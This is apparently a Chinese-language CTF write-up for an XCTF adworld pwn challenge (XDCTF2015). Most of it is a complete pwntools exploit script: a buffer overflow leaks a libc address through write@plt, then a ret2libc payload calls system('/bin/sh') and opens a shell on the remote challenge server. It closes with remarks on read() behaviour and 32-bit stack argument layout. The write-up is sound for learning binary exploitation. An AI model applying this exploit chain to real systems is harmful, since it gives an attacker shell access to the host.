学了64位的ROPGadgets就把32位咋传参的搞忘了???
https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4847&page=1
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 | from pwn import * from LibcSearcher import * import time context.log_level="debug" context(arch="amd64",os="linux") z = remote('111.198.29.45',49363) z.recvuntil("Welcome to XDCTF2015~!\n") elf = ELF("./pwn") write_plt = elf.plt['write'] read_got = elf.got['read'] main_addr = 0x80484be payload = b'a'*0x6c + p32(0) + p32(write_plt) + p32(main_addr) + p32(1) + p32(read_got) + p32(4) + b'a'*(0x100-6*4-0x6c) z.send(payload) read_addr = u32(z.recv(4)) print(hex(read_addr)) libc = LibcSearcher('read',read_addr) libc_addr = read_addr - libc.dump('read') sys_addr = libc_addr + libc.dump('system') binsh_addr = libc_addr + libc.dump('str_bin_sh') payload2 = b'a'*0x6c + p32(0) + p32(sys_addr) + p32(0) + p32(binsh_addr) + b'a'*(0x100-4*4-0x6c) z.send(payload2) z.interactive() |
有两点要注意:一个是read函数会不多不少的读入给定的字节数,不需要换行,如果多打了换行是会算到下一个read里的。
(更新:用换行可以提前结束read函数,且这个换行符会被读入)
还有一个问题是又和64位搞混了。把栈布局成了write_plt,1,read_got,4,main_addr的结构。这是错误的。栈应该如下布置:call_function,return_function,var_1,var_2,…